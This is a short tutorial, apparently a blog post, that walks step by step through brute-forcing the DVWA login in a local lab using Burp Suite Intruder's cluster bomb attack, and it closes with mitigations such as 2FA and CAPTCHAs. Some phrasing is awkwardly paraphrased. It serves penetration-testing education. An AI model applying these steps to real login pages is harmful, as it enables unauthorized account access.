Brute Force in DVWA (Low Security)

• Brute Force

Brute Force attack is an experimentation strategy used to get data, for example, a client secret word or individual distinguishing proof number (PIN).

Tools Required:

1. Burp Suite

2. Firefox

3. DVWA

4. XAMPP Control Panel

Burp Suite

Burp Suite is an integrated stage for performing security testing of web applications. It is intended to be utilized by hands-on analyzers to help the testing procedure. With a tad of exertion, anybody can begin utilizing the center highlights of Burp to test the security of their applications.

Firefox

Firefox is one of the most popular browsers.

DVWA

DVWA is a platform to learn web applications for pen tests. It’s anything but difficult to utilize and is intended for labs.

XAMPP Control Panel

XAMPP Control Panel is a free and open-source cross-platform web server.

Step 1: Open the XAMPP control panel and start “Apache” and “MySQL”.

Figure:1

Step 2: Open login page in DVWA in local-host(127.0.0.1/dvwa).

Figure:2

Step 3: Log in to the DVWA and click on the “DVWA Security” button and change the security level to low from impossible.

Figure:3

Step 4: Make sure the browser is configured with Burp Suite. Connect the browser with proxy.

Figure:4

Step 5: Open Brute Force in DVWA.

Figure:5

Step 6: Make sure the intercept tab is turned on in the burp suite.

Figure:6

Step 7: Enter some random username and password so that you can get errors. The username and password you entered will be visible on the burp suite. Right-click and click on the ‘Send to Intruder’ option.

Figure:7

Step 8: Click on the “Intruder” tab and change the attack type to a Cluster bomb. Now, click on the clear button and add username and password only.

Figure:8

Step 9: In the intruder tab, go to the Payloads tab. Now, add some possible usernames in the blank field.

Figure:9

Step 10: Now, go to payload 2. It is the place for passwords. Enter some suitable passwords in the blank field.

Figure:10

Step 11: Then, go to the options tab and click on the clear button. When we created an error in the DVWA page, there was a “Username and/or password incorrect.” response. So, we are going to let know the burp suite if “Username and/or password incorrect.” shows up in the response.

Figure:11

Step 12: Now, preparation is ready for the attack. Click on the attack button and the brute force attack will start. After it is finished, look for the unchecked box in the attack. That is the password for the website login page.

Figure:12

Step 13:Now, the user will be logged in. Hence, the attack is successful.

Figure:13

Problems caused by Brute Force Attack:

· The attacker can use many possibilities of username and password to get access to the account.

· The personal data can be obtained if the username and password are received by the attacker.

Mitigation:

• Use Strong Passwords

• Use CAPTCHAs

• Use Two-Factor Authentication (2FA)

• The default username ‘admin’ should be renamed and used with strong usernames.

Conclusion:

Brute force attacks are utilized to get through safety efforts so they can arrive at the expected information target. While this may appear as though something no one but programmers can use for their potential benefit, numerous security firms utilize savage power assaults to help test their customers’ frameworks.

A 16 year old guy.